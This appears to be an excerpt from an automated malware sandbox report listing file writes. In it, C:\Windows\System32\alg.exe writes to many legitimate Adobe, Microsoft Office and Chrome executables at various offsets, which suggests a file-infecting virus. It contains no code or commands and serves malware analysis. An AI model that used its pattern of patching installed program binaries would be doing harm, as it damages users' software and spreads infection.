                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332736Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 285633Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 385536Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 959052Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 958976Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 182364Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 123904Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697420Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697344Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 66716Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1102848Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676364Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676288Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 753617Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 2531840Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105356Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105280Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 1150992Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 459776Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033292Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033216Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 209348Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 99840Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673356Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673280Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 69527Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 256512Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 830028Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 829952Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 72028Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 521216Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094732Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094656Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 321696Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 210944Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784460Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784384Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 126840Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 13312Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586828Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586752Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 2828Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 4785664Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359180Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359104Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 2430581Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 632832Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206348Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206272Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 206444Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 2578944Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152460Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152384Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 16859Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 1617920Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191436Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191360Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 860981Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 258048Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831564Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831488Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 82352Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5274624Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848140Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848064Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 3286540Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 185344Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758860Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758784Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 151349Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 26954240Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527756Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527680Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 11401068Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4392960Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966476Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966400Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 2843313Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 1576448Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149964Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149888Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 574636Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4318208Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891724Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891648Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 1700540Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4318208Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891724Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891648Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 1700540Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0Jump to behavior
